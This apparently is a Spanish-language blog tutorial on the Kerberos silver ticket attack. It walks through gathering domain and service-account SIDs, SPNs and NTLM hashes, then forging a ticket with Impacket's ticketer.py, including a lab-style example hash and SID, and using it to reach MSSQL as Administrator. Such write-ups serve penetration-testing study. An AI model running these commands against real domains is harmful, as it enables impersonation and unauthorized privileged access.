Ataque Silver Ticket

Un ataque de silver ticket consiste en forjar un ticket de servicio Kerberos para obtener acceso no autorizado a un servicio específico en un servidor. A diferencia de un golden ticket, que permite acceso a cualquier recurso del dominio, el silver ticket se enfoca en un servicio concreto (por ejemplo, MSSQL) y puede usarse para hacerse pasar por un administrador u otra cuenta privilegiada en ese servicio.

Requisitos

Para realizar un ataque de silver ticket, necesitas lo siguiente:

Hash NTLM de la cuenta de servicio: El hash de la cuenta asociada al servicio objetivo (por ejemplo, la cuenta de servicio de MSSQL).
SID del dominio: El identificador de seguridad (SID) del dominio de Active Directory.
SID de la cuenta de servicio: El SID de la cuenta de servicio.
Nombre del servicio: El nombre del servicio principal de Kerberos (SPN) del servicio objetivo (por ejemplo, MSSQLSvc).
Nombre del dominio: El nombre de dominio completo (FQDN) de Active Directory.
Nombre del servidor: El FQDN del servidor que aloja el servicio.

Comandos para Obtener la Información Requerida (Sin Permisos de Administrador)

Obtener el hash NTLM de la cuenta de servicio:
- Sin permisos de administrador, puedes intentar obtener el hash NTLM de la cuenta de servicio mediante técnicas como:
  - Kerberoasting: articulo acá
  - Si conocemos la contraseña en texto plano podemos generar el hash NTLM: versión web
    echo -n "<CONTRASEÑA>" | iconv -t UTF16LE | openssl dgst -md4
Obtener el SID del dominio:
- Usa ldapsearch o herramientas de enumeración como rpcclient con credenciales de usuario estándar.
```
rpcclient -U "<DOMINIO>/<USUARIO>%<CONTRASEÑA>" <DC_IP>
rpcclient> lookupnames <NOMBRE_DOMINIO>
```
  - El SID del dominio tiene el formato S-1-5-21-<números_específicos_del_dominio>.
  - Alternativamente, con PowerShell (si tienes acceso):
    [System.Security.Principal.WindowsIdentity]::GetCurrent().User.AccountDomainSid
Obtener el SID de la cuenta de servicio:
- Usa rpcclient para enumerar el SID de la cuenta de servicio.
```
rpcclient -U "<DOMINIO>/<USUARIO>%<CONTRASEÑA>" <DC_IP>
rpcclient> lookupnames <NOMBRE_CUENTA_SERVICIO>
```
  - El SID de la cuenta de servicio es el SID del dominio más un identificador relativo (RID), por ejemplo, S-1-5-21-<números_específicos_del_dominio>-<RID>.
  - Alternativamente, con PowerShell:
    Get-ADUser -Identity <NOMBRE_CUENTA_SERVICIO> -Server <DC_FQDN> | Select-Object SID

Identificar el nombre del servicio:

Enumera los SPN del servicio objetivo con setspn o consultas LDAP.

setspn -T <DOMINIO> -Q */*

Busca el SPN, por ejemplo, MSSQLSvc/<SERVIDOR_FQDN>:<PUERTO> para MSSQL.

Con PowerShell:

Get-ADUser -Filter {ServicePrincipalName -like "*"} -Properties ServicePrincipalName | Where-Object { $_.ServicePrincipalName -like "*<SERVICIO>*" }

Nombre del dominio:
- Es el FQDN del dominio, por ejemplo, example.com. Esto suele obtenerse durante la enumeración inicial.
Nombre del servidor:
- El FQDN del servidor que aloja el servicio, por ejemplo, sqlserver.example.com. Se obtiene del SPN o mediante enumeración de red.

Forjar el Silver Ticket con Impacket

Crear el Silver Ticket:
- Usa ticketer.py de Impacket para forjar el ticket Kerberos.
```
python3 ticketer.py -nthash <NTLM_HASH> -domain-sid <SID_DOMINIO> -domain <NOMBRE_DOMINIO> -spn <NOMBRE_SERVICIO> -user-id <RID_CUENTA_SERVICIO> <USUARIO_OBJETIVO>
```
  - Parámetros:
    - -nthash: El hash NTLM de la cuenta de servicio.
    - -domain-sid: El SID del dominio (sin el RID).
    - -domain: El FQDN del dominio (por ejemplo, example.com).
    - -spn: El nombre del servicio principal (por ejemplo, MSSQLSvc/sqlserver.example.com:1433).
    - -user-id: El RID de la cuenta de servicio (la última parte del SID de la cuenta).
    - <USUARIO_OBJETIVO>: El usuario a impersonar (por ejemplo, Administrator).
  - Ejemplo:
    impacket-ticketer -nthash e3a0168bc21cfb88b95c954a5b18f57c -domain-sid S-1-5-21-1969309164-1513403977-1686805993 -domain nagoya-industries.com -spn MSSQL/nagoya-industries.com -user-id 500 Administrator
- El user id 500 es el RID de la cuenta de administrador.
- Esto genera un archivo .ccache con el ticket forjado.
Configurar la variable de entorno para el ticket Kerberos:
- Exporta el ticket para usarlo con otras herramientas de Impacket.
```
export KRB5CCNAME=$(pwd)/<nombre_ticket>.ccache
```
Realizar Pass-the-Ticket (PTT):
- Usa una herramienta de Impacket como mssqlclient.py, psexec.py o smbexec.py para acceder al servicio objetivo con el ticket forjado.
  - Ejemplo para MSSQL:
    python3 mssqlclient.py -k <DOMINIO>/<USUARIO_OBJETIVO>@<SERVIDOR_FQDN> -dc-ip <DC_IP>
    - -k: Indica autenticación Kerberos usando el ticket en KRB5CCNAME.
    - Ejemplo:
      python3 mssqlclient.py -k example/[email protected] -dc-ip 192.168.1.10
    - Esto conecta al servicio MSSQL como el usuario impersonado (por ejemplo, Administrator).

Archivo /etc/krb5user.conf o /etc/krb5.conf

Este archivo es necesario para que el ticket funcione correctamente.

[libdefaults]
        default_realm = EXAMPLE.COM
        kdc_timesync = 1
        ccache_type = 4
        forwardable = true
        proxiable = true
        rdns = false
        dns_canonicalize_hostname = false
        fcc-mit-ticketflags = true

[realms]
        EXAMPLE.COM = {
                kdc = dc01.example.com
        }

[domain_realm]
        .example.com = EXAMPLE.COM

Notas

Asegúrate de que el reloj del sistema esté sincronizado con el controlador de dominio para evitar problemas con los tickets Kerberos.
- Comando: sudo ntpdate -u <IP_DC>
El ticket forjado solo es válido para el servicio y servidor especificados.
Prueba el ticket con herramientas como mssqlclient.py para MSSQL o con otras herramientas de Impacket para diferentes servicios (por ejemplo, psexec.py para CIFS).
Si el ticket falla, verifica la precisión del SPN, el hash y los SIDs.
Sin permisos de administrador, el éxito del ataque depende de obtener el hash NTLM mediante técnicas como Kerberoasting.

Grunt's personal blog